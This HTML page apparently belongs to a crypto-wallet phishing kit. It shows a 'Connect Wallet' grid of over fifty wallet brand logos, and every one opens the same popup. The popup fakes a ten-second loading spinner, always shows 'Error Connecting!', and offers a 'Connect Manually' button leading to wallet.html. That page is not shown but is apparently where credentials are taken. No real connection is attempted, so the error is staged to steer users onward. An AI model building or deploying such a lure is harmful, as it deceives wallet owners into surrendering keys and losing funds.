<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>explorer</title>
    <script src="https://kit.fontawesome.com/46d7328699.js" crossorigin="anonymous"></script>
    <link rel="stylesheet" href="style.css">
    
    <style>
  
    #popup-container {
    position:absolute;
      display: none;
      flex-direction: column;
      align-items: center;
      justify-content: center;
      position: fixed;
      left: -9999px;
      width: 250px;
      height: 250px;
      background-color: #fff;
      border-radius: 8px;
      box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
      text-align: center;
      padding: 30px;
      box-sizing: border-box;
      animation: fadeIn 0.5s ease-out;
    }
    
    #loading-animation {
      border: 8px solid #3498db;
      border-top: 8px solid #f3f3f3;
      border-radius: 50%;
      width: 30px;
      height: 30px;
      animation: spin 1s linear infinite;
      margin-top:20px;
      margin-bottom: 50px;
    }

    @keyframes spin {
      0% { transform: rotate(0deg); }
      100% { transform: rotate(360deg); }
    }

    #error-message {
      color: #e74c3c;
      margin-bottom: 40px;
      display: none;
      font-weight:bold;
      
    }

    #proceed-button {
      
      background-color: #3498db;
      color: #fff;
      font-size: 12px;
      font-weight: bold;
      text-align: center;
      border: none;
      height:20%;
      width:80%;
      border-radius: 18px;
      cursor: pointer;
      transition: background-color 0.3s ease;
    }

    #proceed-button:hover {
      background-color: #2980b9;
    }
    

       .cool-button {
      position: relative;
      width: 50px;
      height: 50px;
      background: none;
      border: none;
      cursor: pointer;
      position: absolute;
      top: 10px;
      right: 10px;
    }

    .cross-line {
      position: absolute;
      width: 2px;
      height: 12px;
      background-color: red;
      transition: transform 0.3s ease-in-out;
    }

    .horizontal-line {
      top: 50%;
      left: 50%;
      transform: translate(-50%, -50%) rotate(-45deg);
    }

    .vertical-line {
      top: 50%;
      left: 50%;
      transform: translate(-50%, -50%) rotate(45deg);
    }

    .cool-button.clicked .horizontal-line {
      transform: translate(-50%, -50%) rotate(45deg);
    }

    .cool-button.clicked .vertical-line {
      transform: translate(-50%, -50%) rotate(-45deg);
    }

    @keyframes fadeIn {
      from { opacity: 0; }
      to { opacity: 1; }
    }
  </style>
    
</head>



<body class="explorer">
    <h1>Connect Wallet</h1>
    <div id="explorer">
        <figure>
            <a href="#" onclick="showPopup()" ><img src="photo/metamask-69ce6b56bbc9953dfb4aecebdf88729b.png" alt="logo"></a>
            <figcaption>MetaMask</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/trust-wallet-66f8777532931d9c09b633344981a6a9.png" alt="logo"></a>
            <figcaption>Trust</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()" ><img src="photo/Argent.jpg" alt="logo"></a>
            <figcaption>WalletConnect</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/atomic-4c02d2b33cf091fd83c7a49819394e41.png" alt="logo"></a>
            <figcaption>Atomic</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/saitama.png" alt="logo"></a>
            <figcaption>Saitamask</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/terra.png" alt="logo"></a>
            <figcaption>Terra</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/bitpay-1573dd6c95eb38386f181048663590d0.jpg" alt="logo"></a>
            <figcaption>Bitpay</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/maiar.png" alt="logo"></a>
            <figcaption>Maiar</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/mykey-7419df5270c0406c80cba19fa5165923.png" alt="logo"></a>
            <figcaption>MyKey</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/atwallet-2611d814a50a964b89d5f8bc1e5cb3a0.png" alt="logo"></a>
            <figcaption>Atwallet</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/authereum-32f3939207b77c1837547d5ed4f86110.png" alt="logo"></a>
            <figcaption>Authereum</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/bitfrost.png" alt="logo"></a>
            <figcaption>Bitfrost</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/coinbase1.png" alt="logo"></a>
            <figcaption>Coinbase</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/coinomi-7eecd68e38d78752d68b7232bd9c58d9.jpg" alt="logo"></a>
            <figcaption>Coinomi</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/D'cent.png" alt="logo"></a>
            <figcaption>D'Cent</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/easypocket-436ea3270a7bf77c02a880bfc70d0ee8.jpg" alt="logo"></a>
            <figcaption>Easypocket</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/Ledger1.png" alt="logo"></a>
            <figcaption>Ledger</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/coolwallet-s-cc612ee7a151c1863293fcc69dd0f677.png" alt="logo"></a>
            <figcaption>Coolwallet</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/cybavowallet-16e7e96f2e3df01fe2170da5267774b5.png" alt="logo"></a>
            <figcaption>CybavoWallet</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/coin98-c5b50adaceaf474e48ef1dad150d0829.png" alt="logo"></a>
            <figcaption>Coin98</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/harmony.png" alt="logo"></a>
            <figcaption>Harmony</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/peakdefi-2e1d4f97cc1a737a9aa765b3748ff315.png" alt="logo"></a>
            <figcaption>PeakDefi</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/gridplus-8cedce167d37ddaa02f2afdf55841d8c.png" alt="logo"></a>
            <figcaption>GridPlus</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/viawallet-ae1502eddf4d2ed89abd36907dd3ae8a.png" alt="logo"></a>
            <figcaption>VIA</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/imtoken.jpg" alt="logo"></a>
            <figcaption>Imtoken</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/infinito.png" alt="logo"></a>
            <figcaption>Infinito</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/infinity-wallet.png" alt="logo"></a>
            <figcaption>Infinity</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/kardachain.png" alt="logo"></a>
            <figcaption>kardachain</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/keplr.png" alt="logo"></a>
            <figcaption>keplr</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/midas-wallet-5c5057d972ca621414f077541845fc61.png" alt="logo"></a>
            <figcaption>Midas</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/morixwallet-aa7d607cf9ad52afeb3b7c83e5f34eba.png" alt="logo"></a>
            <figcaption>Morixwallet</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/Midas.png" alt="logo"></a>
            <figcaption>Midas</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/Nash.jpg" alt="logo"></a>
            <figcaption>Nash</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/onto.png" alt="logo"></a>
            <figcaption>Onto</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/ownbit.png" alt="logo"></a>
            <figcaption>Ownbit</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/pillar.png" alt="logo"></a>
            <figcaption>Pillar</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/rainbow.png" alt="logo"></a>
            <figcaption>Rainbow</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/SafePal1.jpg" alt="logo"></a>
            <figcaption>Safepal</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/sollet.jpg" alt="logo"></a>
            <figcaption>Sollet</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/Spark.png" alt="logo"></a>
            <figcaption>Spark</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/Spatium.png" alt="logo"></a>
            <figcaption>Spatium</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/tokenary.jpg" alt="logo"></a>
            <figcaption>Tokenary</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/Tokenpocket.jpg" alt="logo"></a>
            <figcaption>Tokenpocket</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/tomo.png" alt="logo"></a>
            <figcaption>Tomo</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/torus.png" alt="logo"></a>
            <figcaption>Torus</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/coinbase.jpg" alt="logo"></a>
            <figcaption>Coinbase</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/XDC1.png" alt="logo"></a>
            <figcaption>XDC</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/wallet.io.png" alt="logo"></a>
            <figcaption>Wallet.io</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/Walleth.jpg" alt="logo"></a>
            <figcaption>Walleth</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/Zelcore.png" alt="logo"></a>
            <figcaption>Zelcore</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/phantom.jpg" alt="logo"></a>
            <figcaption>Phantom</figcaption>
        </figure>
        <figure>
            <a href="#" onclick="showPopup()"><img src="photo/exodus.jpg" alt="logo"></a>
            <figcaption>Exodus</figcaption>
        </figure>
        </div>
        
        <div id="popup-container">
    <div id="loading-animation"></div>
    <div id="error-message">Error Connecting!</div>
    <button id="proceed-button" onclick="proceed()">Connect Manually</button>
     <button class="cool-button" onclick="closePopup()">
    <div class="cross-line horizontal-line"></div>
    <div class="cross-line vertical-line"></div>
  </button>
  </div>

    <script>
    function closePopup() {
      let loadingAnimation = document.getElementById('loading-animation');
      let errorMessage = document.getElementById('error-message');
      
      // Reset loading animation and hide error message
      loadingAnimation.style.display = 'block';
      errorMessage.style.display = 'none';

      document.getElementById('popup-container').style.display = 'none';
    
    }

    function showPopup() {
    
    document.getElementById('popup-container').style.left = '15%';
      document.getElementById('popup-container').style.display = 'flex';
      
    // Simulate loading and show error
    setTimeout(function() {
        let loadingAnimation = document.getElementById('loading-animation');
        let errorMessage = document.getElementById('error-message');

        loadingAnimation.style.display = 'none';
        errorMessage.style.display = 'block';
      }, 10000);
    }
    function proceed() {
      // Your logic here, if any
      window.location.href = 'wallet.html'; // Navigate to the "wallet.html" page
    }
  </script>
        
</body>
</html>
